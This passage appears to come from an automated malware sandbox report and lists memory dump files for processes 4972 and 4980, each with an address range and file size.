                                                                                                        • memory/4972-226-0x0000000000400000-0x000000000041E000-memory.dmp
                                                                                                          Filesize

                                                                                                          120KB

                                                                                                        • memory/4980-283-0x0000000000630000-0x0000000000853000-memory.dmp
                                                                                                          Filesize

                                                                                                          2.1MB

                                                                                                        • memory/4980-280-0x00000000778D0000-0x0000000077AE5000-memory.dmp
                                                                                                          Filesize

                                                                                                          2.1MB

                                                                                                        • memory/4980-298-0x0000000075C40000-0x00000000761F3000-memory.dmp
                                                                                                          Filesize

                                                                                                          5.7MB

                                                                                                        • memory/4980-300-0x0000000000630000-0x0000000000853000-memory.dmp
                                                                                                          Filesize

                                                                                                          2.1MB

                                                                                                        • memory/4980-272-0x0000000000980000-0x0000000000981000-memory.dmp
                                                                                                          Filesize

                                                                                                          4KB

                                                                                                        • memory/4980-270-0x0000000000CD0000-0x0000000000D16000-memory.dmp
                                                                                                          Filesize

                                                                                                          280KB

                                                                                                        • memory/4980-305-0x0000000075330000-0x000000007537C000-memory.dmp
                                                                                                          Filesize

                                                                                                          304KB

                                                                                                        • memory/4980-269-0x0000000000630000-0x0000000000853000-memory.dmp
                                                                                                          Filesize

                                                                                                          2.1MB

                                                                                                        • memory/4980-286-0x0000000000630000-0x0000000000853000-memory.dmp
                                                                                                          Filesize

                                                                                                          2.1MB

                                                                                                        • memory/4980-290-0x0000000071F40000-0x0000000071FC9000-memory.dmp
                                                                                                          Filesize

                                                                                                          548KB

                                                                                                        • memory/4980-297-0x0000000002800000-0x0000000002801000-memory.dmp
                                                                                                          Filesize

                                                                                                          4KB